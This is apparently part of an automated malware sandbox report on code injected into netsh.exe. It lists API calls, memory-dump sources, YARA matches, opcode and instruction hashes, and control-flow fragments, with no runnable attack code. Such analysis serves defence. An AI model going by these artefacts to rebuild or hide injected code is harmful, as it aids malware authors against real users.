                                                                                                      • Opcode Fuzzy Hash: 07f1b093c8ac46202dd93a3a0b20a7864efae37e8d884af7c551f8ee2be6021f
                                                                                                      • Instruction Fuzzy Hash: 3F31D2B5A01248AFDB14DF99DC81EEEB7B9EF8C714F108209F918A7241D674A811CBA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: DeleteFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 4033686569-0
                                                                                                      • Opcode ID: 50534f20ffc5672809148808016a6915c0ab32bbbc46f4291d9df044d7672cf6
                                                                                                      • Instruction ID: 6706a11d1d002291019dc89639937c946b040448d5454fcc61ac1d81331649c0
                                                                                                      • Opcode Fuzzy Hash: 50534f20ffc5672809148808016a6915c0ab32bbbc46f4291d9df044d7672cf6
                                                                                                      • Instruction Fuzzy Hash: A101A5716012147BD210EBA4DC46FEB73ACEB85714F404209FA18A72C1DB707901C7E6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00C27927
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID:
                                                                                                      • API String ID: 3535843008-0
                                                                                                      • Opcode ID: df1470d35645786788c12b704a489055868d3b7b6fb03ba64aaf800453adc970
                                                                                                      • Instruction ID: 0e1dd89392cba65eda644a86ef576c0945c06b36a44706e792203a147cd053c5
                                                                                                      • Opcode Fuzzy Hash: df1470d35645786788c12b704a489055868d3b7b6fb03ba64aaf800453adc970
                                                                                                      • Instruction Fuzzy Hash: 88E04F312002147BD510BB59DC42FD7B75CDFC5720F404015FA08A7142CA70B91187B1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: ecf1a3b6b8e19e7d437d02d2b56aae41c5ae3df78f5707664cb7fc1bcb2d60a3
                                                                                                      • Instruction ID: c5b83e1583e4c4d7756008a8621cc82e48c55f8bb138366906b5263fbb5b8e2c
                                                                                                      • Opcode Fuzzy Hash: ecf1a3b6b8e19e7d437d02d2b56aae41c5ae3df78f5707664cb7fc1bcb2d60a3
                                                                                                      • Instruction Fuzzy Hash: 7390023161584422A140B15948C454A400597E0301B55C029E0424564C8B158A565362
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 230dcda87921a0bd4166be649c20e71e46ca350711a3b8a02b44670ea68688f3
                                                                                                      • Instruction ID: 695a732bdef789ef9da82577ff1b6dff033dc23a422cbbd42a0ff02278f7b131
                                                                                                      • Opcode Fuzzy Hash: 230dcda87921a0bd4166be649c20e71e46ca350711a3b8a02b44670ea68688f3
                                                                                                      • Instruction Fuzzy Hash: 89900261611544525140B159484440A600597E1301395C12DA0554570C87198955926A
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 0db5fcc634406122f1b7cf3b9fbedab5bde8926d9e7674b377a6bf1de9f3d40e
                                                                                                      • Instruction ID: b6b54f52440dfee2d005f705740dedeabcf2a4f802763003b70522154541b336
                                                                                                      • Opcode Fuzzy Hash: 0db5fcc634406122f1b7cf3b9fbedab5bde8926d9e7674b377a6bf1de9f3d40e
                                                                                                      • Instruction Fuzzy Hash: B9900261212444135105B159445461A400A87E0301B55C039E10145A0DC62689916126
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: fd9cc16e90f4bfa73cd7884b93ede1532b8402bc3d63f4be0b2be82eeb15fbe8
                                                                                                      • Instruction ID: 3ca9969354fff84ddb932eb20ee514eb5202d9e49b27f16aa6245742256542d5
                                                                                                      • Opcode Fuzzy Hash: fd9cc16e90f4bfa73cd7884b93ede1532b8402bc3d63f4be0b2be82eeb15fbe8
                                                                                                      • Instruction Fuzzy Hash: 69900225231444121145F559064450F044597D6351395C02DF14165A0CC72289655322
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 410cae748392df966ea0f900380d6c8090d818ecd8222a621b24969ef194978b
                                                                                                      • Instruction ID: e294b3642e4ca6ff9df9efc038969ac04d63750b9670a4c1c5d9894c55a83399
                                                                                                      • Opcode Fuzzy Hash: 410cae748392df966ea0f900380d6c8090d818ecd8222a621b24969ef194978b
                                                                                                      • Instruction Fuzzy Hash: 0E900435331444131105F55D074450F0047C7D5351355C03DF1015570CD733CD715133
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 61595aae6265ee9d3943cf309a04a2a18db86c2955ce73fa91c69b0167f53571
                                                                                                      • Instruction ID: bd243a0d4b9656322d732506186ff5feef5ebdf913ba1cc9eccd6fdab6a11f67
                                                                                                      • Opcode Fuzzy Hash: 61595aae6265ee9d3943cf309a04a2a18db86c2955ce73fa91c69b0167f53571
                                                                                                      • Instruction Fuzzy Hash: EE900221221C4452E200B5694C54B0B000587D0303F55C12DA0154564CCA1689615522
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 6013511d13ef01667d739b28cd40323bb8265d379e37832e769f6d534bce591d
                                                                                                      • Instruction ID: 53d50d19cf5ee9bd5a558b983a7cafbbe14eda146cfc45f5c3d669a446538964
                                                                                                      • Opcode Fuzzy Hash: 6013511d13ef01667d739b28cd40323bb8265d379e37832e769f6d534bce591d
                                                                                                      • Instruction Fuzzy Hash: 21900221611444525140B169888490A4005ABE1311755C139A0998560D865A89655666
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 3d761f7bf052b9f47a1b8523d5afbdc310362dec0a8b896a9dd2415500c0657a
                                                                                                      • Instruction ID: 3ebe3221104b2058d282c806fc0d6bcc87d36594305ef972e12cd186e61fbc5c
                                                                                                      • Opcode Fuzzy Hash: 3d761f7bf052b9f47a1b8523d5afbdc310362dec0a8b896a9dd2415500c0657a
                                                                                                      • Instruction Fuzzy Hash: 5D90026121184813E140B559484460B000587D0302F55C029A2064565E8B2A8D516136
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 05e14d307bed0fe5b5648cd9da3e2de984fbbbcde6ab48dfe21eb871db31a28d
                                                                                                      • Instruction ID: 0326b07043b5ac0e1100348ecfeae569daec73a9829bea1180f3d1340846c3f1
                                                                                                      • Opcode Fuzzy Hash: 05e14d307bed0fe5b5648cd9da3e2de984fbbbcde6ab48dfe21eb871db31a28d
                                                                                                      • Instruction Fuzzy Hash: 1990022131144413E140B159545860A4005D7E1301F55D029E0414564CDA1689565223
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 81bf090b6b7c1e0631093994b7b80449044bd54990bd6dd2aff53c50b5314bb6
                                                                                                      • Instruction ID: 7d491f16646ec6120343efd6234efb6f589b2328ce355073d2c95b06c100248c
                                                                                                      • Opcode Fuzzy Hash: 81bf090b6b7c1e0631093994b7b80449044bd54990bd6dd2aff53c50b5314bb6
                                                                                                      • Instruction Fuzzy Hash: 0790022922344412E180B159544860E000587D1302F95D42DA0015568CCA1689695322
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 2c414a72d58fa9c21ecbba429e4b274c8687d9ec240a11aa02f5e8d6a318d251
                                                                                                      • Instruction ID: fd4635e9e153ad80351c4efdd02a8ef6b0672d58fcfd49e23e6362a80e77222a
                                                                                                      • Opcode Fuzzy Hash: 2c414a72d58fa9c21ecbba429e4b274c8687d9ec240a11aa02f5e8d6a318d251
                                                                                                      • Instruction Fuzzy Hash: 4790023121144823E111B159454470B000987D0341F95C42AA0424568D97578A52A122
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 30b2ae8f9fe4fbf6978558a41b9435882c9dbdb5293bb4c3f8e7d5a16751afe0
                                                                                                      • Instruction ID: cf3c5056857058ecd4dc7197011552284cb4bb9401bc8f94eaa2460b9b8bee8b
                                                                                                      • Opcode Fuzzy Hash: 30b2ae8f9fe4fbf6978558a41b9435882c9dbdb5293bb4c3f8e7d5a16751afe0
                                                                                                      • Instruction Fuzzy Hash: 65900221252485626545F159444450B400697E0341795C02AA1414960C86279956D622
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 4889296cfe23a25a2ec3a7d1084fbf29df3f216278e0d0dd446845e80df4f808
                                                                                                      • Instruction ID: 548e1be19088a5903143f9d4564398fd34e501dd404a75be2feb806551ca805e
                                                                                                      • Opcode Fuzzy Hash: 4889296cfe23a25a2ec3a7d1084fbf29df3f216278e0d0dd446845e80df4f808
                                                                                                      • Instruction Fuzzy Hash: F59002312114CC12E110B159844474E000587D0301F59C429A4424668D879689917122
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 77f121bd877cfa81a8cd01d9f9777e7a1d1a97ece20cdfb23b8966e7b352c3f6
                                                                                                      • Instruction ID: e8d980ed124135119d45c5ccfcc0adb6bb1e9d9d0805e941826e93ec203085cf
                                                                                                      • Opcode Fuzzy Hash: 77f121bd877cfa81a8cd01d9f9777e7a1d1a97ece20cdfb23b8966e7b352c3f6
                                                                                                      • Instruction Fuzzy Hash: 1F90023121144C52E100B1594444B4A000587E0301F55C02EA0124664D8716C9517522
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 030b4685a6e249efb7e222c015ac4799afcf0da137957e5f9c85bc789e19c95f
                                                                                                      • Instruction ID: c55945e20f95c4b8a075ae2dfc51ba9d6d2873798d664e0d13c0ead210a10b01
                                                                                                      • Opcode Fuzzy Hash: 030b4685a6e249efb7e222c015ac4799afcf0da137957e5f9c85bc789e19c95f
                                                                                                      • Instruction Fuzzy Hash: 3390023121144812E100B599544864A000587E0301F55D029A5024565EC76689916132
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 523 c102a0-c102c3 524 c102c6-c102cd 523->524 525 c102dd 523->525 526 c102cf-c102d7 524->526 527 c102de-c1034a call c298b0 call c2a2c0 call c13ce0 call c01410 call c20b70 524->527 525->527 526->525 538 c1036a-c10370 527->538 539 c1034c-c1035b PostThreadMessageW 527->539 539->538 540 c1035d-c10367 539->540 540->538
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(1-00F23L,00000111,00000000,00000000), ref: 00C10357
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 1-00F23L$1-00F23L
                                                                                                      • API String ID: 1836367815-1360091209
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 541 c102d8-c1034a call c298b0 call c2a2c0 call c13ce0 call c01410 call c20b70 554 c1036a-c10370 541->554 555 c1034c-c1035b PostThreadMessageW 541->555 555->554 556 c1035d-c10367 555->556 556->554
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(1-00F23L,00000111,00000000,00000000), ref: 00C10357
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 1-00F23L$1-00F23L
                                                                                                      • API String ID: 1836367815-1360091209
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 557 c102e0-c102f2 558 c102fa-c1034a call c2a2c0 call c13ce0 call c01410 call c20b70 557->558 559 c102f5 call c298b0 557->559 568 c1036a-c10370 558->568 569 c1034c-c1035b PostThreadMessageW 558->569 559->558 569->568 570 c1035d-c10367 569->570 570->568
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(1-00F23L,00000111,00000000,00000000), ref: 00C10357
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 1-00F23L$1-00F23L
                                                                                                      • API String ID: 1836367815-1360091209
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 00C2251B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Sleep
                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 00C111AA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Startup
                                                                                                      • String ID: 4
                                                                                                      • API String ID: 724789610-4088798008
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 00C111AA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
